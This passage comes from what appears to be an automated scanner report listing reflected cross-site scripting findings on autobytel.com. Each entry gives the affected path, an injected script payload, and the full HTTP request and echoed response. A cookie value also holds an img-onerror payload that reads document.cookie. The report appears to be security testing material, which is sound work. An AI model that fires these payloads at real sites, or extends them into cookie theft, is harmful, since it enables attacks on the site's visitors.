User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:50:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:50:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:50:40 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:50:40 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 33949

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/car-incentives.htm?62a66"><script>alert(1)</script>d49e48ec7f0=1">
...[SNIP]...

4.483. http://www.autobytel.com/car-news.htm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-news.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce21d"><script>alert(1)</script>3aec2d5e3b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /car-news.htm?ce21d"><script>alert(1)</script>3aec2d5e3b1=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:59:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:59:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:59:54 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:59:54 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 40907

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/car-news.htm?ce21d"><script>alert(1)</script>3aec2d5e3b1=1">
...[SNIP]...

4.484. http://www.autobytel.com/car-pictures.htm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-pictures.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d31c5"><script>alert(1)</script>0161e7b6f7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /car-pictures.htm?d31c5"><script>alert(1)</script>0161e7b6f7e=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 43571
Expires: Mon, 24 Jan 2011 23:57:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:57:09 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:57:09 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:57:09 GMT;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/car-pictures.htm?d31c5"><script>alert(1)</script>0161e7b6f7e=1">
...[SNIP]...

4.485. http://www.autobytel.com/car-reviews.htm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-reviews.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85055"><script>alert(1)</script>0f5db676ef2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /car-reviews.htm?85055"><script>alert(1)</script>0f5db676ef2=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:57:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:57:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:57:39 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:57:39 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 49248

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/car-reviews.htm?85055"><script>alert(1)</script>0f5db676ef2=1">
...[SNIP]...

4.486. http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/finance/index.cfm/action/Calculator

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9428c"><script>alert(1)</script>80066caf137 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/buy/finance/index.cfm/action/Calculator?9428c"><script>alert(1)</script>80066caf137=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:05 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:05 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 35888



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengr
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator?9428c"><script>alert(1)</script>80066caf137=1">
...[SNIP]...

4.487. http://www.autobytel.com/content/buy/warranty/index.cfm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/warranty/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 972de"><script>alert(1)</script>4370f7100ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/buy/warranty/index.cfm?972de"><script>alert(1)</script>4370f7100ff=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:35:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:35:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:35:25 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:35:25 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 39531

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/buy/warranty/index.cfm?972de"><script>alert(1)</script>4370f7100ff=1">
...[SNIP]...

4.488. http://www.autobytel.com/content/home/help/index.cfm [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6ac1"><script>alert(1)</script>8ce2ae86fd0 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/home/help/index.cfm?id=13148;ABTLe6ac1"><script>alert(1)</script>8ce2ae86fd0&action=privacy HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:39:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:39:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:39:20 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:39:20 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 55374

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/home/help/index.cfm?id=13148;ABTLe6ac1"><script>alert(1)</script>8ce2ae86fd0&action=privacy">
...[SNIP]...

4.489. http://www.autobytel.com/content/home/help/index.cfm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85633"><script>alert(1)</script>76dec51da84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/home/help/index.cfm?85633"><script>alert(1)</script>76dec51da84=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:43:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:43:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:43:35 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:43:35 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45285

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/home/help/index.cfm?85633"><script>alert(1)</script>76dec51da84=1">
...[SNIP]...

4.490. http://www.autobytel.com/content/home/help/index.cfm/action/about [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/about

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a165"><script>alert(1)</script>04f69bcc06f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/home/help/index.cfm/action/about?1a165"><script>alert(1)</script>04f69bcc06f=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:42:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:42:36 GMT
Content-Length: 32367
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:42:36 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:42:36 GMT;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/home/help/index.cfm/action/about?1a165"><script>alert(1)</script>04f69bcc06f=1">
...[SNIP]...

4.491. http://www.autobytel.com/content/home/help/index.cfm/action/contact [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/contact

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e53c1"><script>alert(1)</script>1096707d8b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/home/help/index.cfm/action/contact?e53c1"><script>alert(1)</script>1096707d8b0=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 36652
Expires: Mon, 24 Jan 2011 23:36:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:36:34 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:36:34 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:36:34 GMT;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/home/help/index.cfm/action/contact?e53c1"><script>alert(1)</script>1096707d8b0=1">
...[SNIP]...

4.492. http://www.autobytel.com/content/home/help/index.cfm/action/privacy [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/privacy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7baa5"><script>alert(1)</script>7e39fdfacf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/home/help/index.cfm/action/privacy?7baa5"><script>alert(1)</script>7e39fdfacf3=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:52:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:52:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:52:41 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:52:41 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 55363

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/content/home/help/index.cfm/action/privacy?7baa5"><script>alert(1)</script>7e39fdfacf3=1">
...[SNIP]...

4.493. http://www.autobytel.com/content/home/help/index.cfm/action/terms [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/terms

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c24ec"><script>alert(1)</script>ea08fbb8c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/home/help/index.cfm/action/terms?c24ec"><script>alert(1)</script>ea08fbb8c3=1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
